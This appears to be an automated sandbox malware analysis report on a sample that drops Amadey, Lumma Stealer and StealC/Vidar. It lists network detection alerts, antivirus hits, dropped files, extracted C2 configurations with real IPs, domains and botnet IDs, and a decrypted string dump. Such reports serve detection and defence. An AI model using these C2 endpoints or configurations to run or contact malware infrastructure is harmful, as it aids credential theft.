2024-11-05T18:46:59.057136+0100	2054653	1	A Network Trojan was detected	192.168.2.4	60481	104.21.5.155	443	TCP
2024-11-05T18:47:00.898710+0100	2054653	1	A Network Trojan was detected	192.168.2.4	60494	104.21.16.142	443	TCP
2024-11-05T18:47:09.172675+0100	2054653	1	A Network Trojan was detected	192.168.2.4	60560	104.21.5.155	443	TCP
2024-11-05T18:47:10.625383+0100	2054653	1	A Network Trojan was detected	192.168.2.4	60563	104.21.5.155	443	TCP
2024-11-05T18:47:21.793946+0100	2054653	1	A Network Trojan was detected	192.168.2.4	60576	104.21.5.155	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T18:46:23.653795+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49880	104.21.5.155	443	TCP
2024-11-05T18:46:37.657750+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49923	104.21.16.142	443	TCP
2024-11-05T18:46:39.592638+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49934	104.21.5.155	443	TCP
2024-11-05T18:47:09.172675+0100	2049836	1	A Network Trojan was detected	192.168.2.4	60560	104.21.5.155	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T18:46:25.468728+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49885	104.21.5.155	443	TCP
2024-11-05T18:46:41.150018+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49952	104.21.5.155	443	TCP
2024-11-05T18:46:41.251881+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49951	104.21.16.142	443	TCP
2024-11-05T18:47:10.625383+0100	2049812	1	A Network Trojan was detected	192.168.2.4	60563	104.21.5.155	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T18:44:48.799836+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	60576	104.21.5.155	443	TCP
2024-11-05T18:46:23.446833+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	49880	104.21.5.155	443	TCP
2024-11-05T18:46:24.476584+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	49885	104.21.5.155	443	TCP
2024-11-05T18:46:26.519966+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	49892	104.21.5.155	443	TCP
2024-11-05T18:46:27.967613+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	49897	104.21.5.155	443	TCP
2024-11-05T18:46:29.987297+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	49902	104.21.5.155	443	TCP
2024-11-05T18:46:32.507736+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	49911	104.21.5.155	443	TCP
2024-11-05T18:46:34.051559+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	49915	104.21.5.155	443	TCP
2024-11-05T18:46:38.982124+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	49934	104.21.5.155	443	TCP
2024-11-05T18:46:40.508692+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	49949	104.21.5.155	443	TCP
2024-11-05T18:46:40.787195+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	49952	104.21.5.155	443	TCP
2024-11-05T18:46:43.121000+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	49968	104.21.5.155	443	TCP
2024-11-05T18:46:45.027023+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	49984	104.21.5.155	443	TCP
2024-11-05T18:46:47.141209+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	49998	104.21.5.155	443	TCP
2024-11-05T18:46:50.475026+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	50021	104.21.5.155	443	TCP
2024-11-05T18:46:55.186726+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	50051	104.21.5.155	443	TCP
2024-11-05T18:46:58.481039+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	60481	104.21.5.155	443	TCP
2024-11-05T18:47:09.018199+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	60560	104.21.5.155	443	TCP
2024-11-05T18:47:10.263364+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	60563	104.21.5.155	443	TCP
2024-11-05T18:47:11.455309+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	60570	104.21.5.155	443	TCP
2024-11-05T18:47:12.987478+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	60572	104.21.5.155	443	TCP
2024-11-05T18:47:14.435829+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	60573	104.21.5.155	443	TCP
2024-11-05T18:47:16.724211+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	60574	104.21.5.155	443	TCP
2024-11-05T18:47:19.633690+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	60575	104.21.5.155	443	TCP

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T18:46:43.190843+0100	2019714	2	Potentially Bad Traffic	192.168.2.4	49966	185.215.113.16	80	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T18:46:16.115073+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49845	185.215.113.43	80	TCP
2024-11-05T18:46:23.209934+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49877	185.215.113.43	80	TCP
2024-11-05T18:46:29.338402+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49900	185.215.113.43	80	TCP
2024-11-05T18:46:34.595176+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49917	185.215.113.43	80	TCP
2024-11-05T18:46:40.818282+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49950	185.215.113.43	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T18:46:22.082251+0100	2057129	1	Domain Observed Used for C2 Detected	192.168.2.4	62892	1.1.1.1	53	UDP
2024-11-05T18:46:37.623641+0100	2057129	1	Domain Observed Used for C2 Detected	192.168.2.4	60000	1.1.1.1	53	UDP
2024-11-05T18:47:08.277787+0100	2057129	1	Domain Observed Used for C2 Detected	192.168.2.4	50700	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T18:46:22.129077+0100	2057127	1	Domain Observed Used for C2 Detected	192.168.2.4	51650	1.1.1.1	53	UDP
2024-11-05T18:46:37.885333+0100	2057127	1	Domain Observed Used for C2 Detected	192.168.2.4	61458	1.1.1.1	53	UDP
2024-11-05T18:47:08.307763+0100	2057127	1	Domain Observed Used for C2 Detected	192.168.2.4	55546	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T18:46:22.599431+0100	2057121	1	Domain Observed Used for C2 Detected	192.168.2.4	57561	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T18:46:22.497377+0100	2057123	1	Domain Observed Used for C2 Detected	192.168.2.4	62431	1.1.1.1	53	UDP
2024-11-05T18:46:38.018361+0100	2057123	1	Domain Observed Used for C2 Detected	192.168.2.4	52344	1.1.1.1	53	UDP
2024-11-05T18:47:08.364126+0100	2057123	1	Domain Observed Used for C2 Detected	192.168.2.4	54982	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T18:46:22.052673+0100	2057131	1	Domain Observed Used for C2 Detected	192.168.2.4	59286	1.1.1.1	53	UDP
2024-11-05T18:46:37.540802+0100	2057131	1	Domain Observed Used for C2 Detected	192.168.2.4	51691	1.1.1.1	53	UDP
2024-11-05T18:47:08.249359+0100	2057131	1	Domain Observed Used for C2 Detected	192.168.2.4	61019	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T18:46:22.277677+0100	2057125	1	Domain Observed Used for C2 Detected	192.168.2.4	59659	1.1.1.1	53	UDP
2024-11-05T18:46:37.933111+0100	2057125	1	Domain Observed Used for C2 Detected	192.168.2.4	54836	1.1.1.1	53	UDP
2024-11-05T18:47:08.332733+0100	2057125	1	Domain Observed Used for C2 Detected	192.168.2.4	64493	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T18:46:32.935213+0100	2044245	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.4	49909	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T18:46:32.929040+0100	2044244	1	Malware Command and Control Activity Detected	192.168.2.4	49909	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T18:46:33.317944+0100	2044246	1	Malware Command and Control Activity Detected	192.168.2.4	49909	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T18:46:34.530030+0100	2044248	1	Malware Command and Control Activity Detected	192.168.2.4	49909	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T18:46:33.330922+0100	2044247	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.4	49909	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T18:46:32.878381+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49911	104.21.5.155	443	TCP
2024-11-05T18:46:43.250970+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49964	104.21.16.142	443	TCP
2024-11-05T18:47:12.161407+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	60570	104.21.5.155	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T18:46:32.639615+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49909	185.215.113.206	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T18:46:04.415246+0100	2856147	1	A Network Trojan was detected	192.168.2.4	49786	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T18:46:15.209393+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.4	49798	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T18:46:07.775635+0100	2803305	3	Unknown Traffic	192.168.2.4	49804	31.41.244.11	80	TCP
2024-11-05T18:46:17.025081+0100	2803305	3	Unknown Traffic	192.168.2.4	49851	185.215.113.16	80	TCP
2024-11-05T18:46:24.129573+0100	2803305	3	Unknown Traffic	192.168.2.4	49883	185.215.113.16	80	TCP
2024-11-05T18:46:30.324539+0100	2803305	3	Unknown Traffic	192.168.2.4	49904	185.215.113.16	80	TCP
2024-11-05T18:46:35.633054+0100	2803305	3	Unknown Traffic	192.168.2.4	49920	185.215.113.16	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T18:46:35.219583+0100	2803304	3	Unknown Traffic	192.168.2.4	49909	185.215.113.206	80	TCP
2024-11-05T18:46:53.990226+0100	2803304	3	Unknown Traffic	192.168.2.4	50003	185.215.113.206	80	TCP
2024-11-05T18:46:55.367403+0100	2803304	3	Unknown Traffic	192.168.2.4	50003	185.215.113.206	80	TCP
2024-11-05T18:46:56.283590+0100	2803304	3	Unknown Traffic	192.168.2.4	50003	185.215.113.206	80	TCP
2024-11-05T18:46:56.980777+0100	2803304	3	Unknown Traffic	192.168.2.4	50003	185.215.113.206	80	TCP
2024-11-05T18:46:59.332377+0100	2803304	3	Unknown Traffic	192.168.2.4	50003	185.215.113.206	80	TCP
2024-11-05T18:47:00.160603+0100	2803304	3	Unknown Traffic	192.168.2.4	50003	185.215.113.206	80	TCP
2024-11-05T18:47:04.754298+0100	2803304	3	Unknown Traffic	192.168.2.4	60511	185.215.113.16	80	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T18:47:19.637124+0100	2843864	1	A Network Trojan was detected	192.168.2.4	60575	104.21.5.155	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.16/gm	Avira URL Cloud: Label: phishing
Source: http://185.215.113.43/Zu7JuNko/index.phpncoded3$	Avira URL Cloud: Label: malware
Source: https://founpiuer.store/apii	Avira URL Cloud: Label: malware
Source: https://founpiuer.store/es#g	Avira URL Cloud: Label: malware
Source: moutheventushz.shop	Avira URL Cloud: Label: malware
Source: https://worddosofrm.shop:443/api	Avira URL Cloud: Label: malware
Source: standartedby.shop	Avira URL Cloud: Label: malware
Source: https://worddosofrm.shop/api8&=c	Avira URL Cloud: Label: malware
Source: https://founpiuer.store:443/api5Cs	Avira URL Cloud: Label: malware
Source: https://worddosofrm.shop/CoN	Avira URL Cloud: Label: malware
Source: bakedstusteeb.shop	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/steam/random.exe.	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/mine/random.exeE=	Avira URL Cloud: Label: phishing
Source: respectabosiz.shop	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/1ld-	Avira URL Cloud: Label: phishing
Source: conceszustyb.shop	Avira URL Cloud: Label: malware
Source: https://worddosofrm.shop/k	Avira URL Cloud: Label: malware
Source: https://worddosofrm.shop/h	Avira URL Cloud: Label: malware
Source: https://worddosofrm.shop/Y	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 00000001.00000002.1716157140.0000000000941000.00000040.00000001.01000000.00000007.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 10.2.c4df60870c.exe.170000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: 10.2.c4df60870c.exe.170000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: 7.2.freecam.exe.1204e000.2.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["mutterissuen.shop", "nightybinybz.shop", "respectabosiz.shop", "standartedby.shop", "bakedstusteeb.shop", "conceszustyb.shop", "worddosofrm.shop", "moutheventushz.shop"], "Build id": "MkfS5f--"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	ReversingLabs: Detection: 50%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 50%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: INSERT_KEY_HERE
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: 30
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: 11
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: 20
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: 24
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GetProcAddress
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: LoadLibraryA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: lstrcatA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: OpenEventA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: CreateEventA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: CloseHandle
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: Sleep
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GetUserDefaultLangID
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: VirtualAllocExNuma
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: VirtualFree
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GetSystemInfo
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: VirtualAlloc
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: HeapAlloc
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GetComputerNameA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: lstrcpyA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GetProcessHeap
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GetCurrentProcess
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: lstrlenA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: ExitProcess
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GlobalMemoryStatusEx
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GetSystemTime
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: SystemTimeToFileTime
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: advapi32.dll
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: gdi32.dll
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: user32.dll
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: crypt32.dll
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: ntdll.dll
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GetUserNameA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: CreateDCA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GetDeviceCaps
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: ReleaseDC
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: CryptStringToBinaryA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: sscanf
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: VMwareVMware
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: HAL9TH
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: JohnDoe
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: DISPLAY
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: %hu/%hu/%hu
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: http://185.215.113.206
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: bksvnsj
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: /6c4adf523b719729.php
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: /746f34465cf17784/
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: tale
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GetEnvironmentVariableA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GetFileAttributesA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GlobalLock
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: HeapFree
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GetFileSize
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GlobalSize
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: IsWow64Process
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: Process32Next
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GetLocalTime
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: FreeLibrary
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GetTimeZoneInformation
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GetSystemPowerStatus
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GetVolumeInformationA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GetWindowsDirectoryA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: Process32First
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GetLocaleInfoA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GetUserDefaultLocaleName
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GetModuleFileNameA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: DeleteFileA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: FindNextFileA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: LocalFree
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: FindClose
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: SetEnvironmentVariableA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: LocalAlloc
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GetFileSizeEx
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: ReadFile
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: SetFilePointer
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: WriteFile
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: CreateFileA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: FindFirstFileA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: CopyFileA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: VirtualProtect
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GetLastError
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: lstrcpynA
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: MultiByteToWideChar
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GlobalFree
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: WideCharToMultiByte
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GlobalAlloc
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: OpenProcess
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: TerminateProcess
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GetCurrentProcessId
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: gdiplus.dll
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: ole32.dll
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: bcrypt.dll
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: wininet.dll
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: shlwapi.dll
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: shell32.dll
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: psapi.dll
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: rstrtmgr.dll
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: CreateCompatibleBitmap
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: SelectObject
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: BitBlt
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: DeleteObject
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: CreateCompatibleDC
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GdipGetImageEncodersSize
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GdipGetImageEncoders
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GdiplusStartup
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GdiplusShutdown
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GdipSaveImageToStream
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GdipDisposeImage
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GdipFree
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: GetHGlobalFromStream
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: CreateStreamOnHGlobal
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: CoUninitialize
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: CoInitialize
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: CoCreateInstance
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 10.2.c4df60870c.exe.170000.0.unpack	String decryptor: BCryptDecrypt
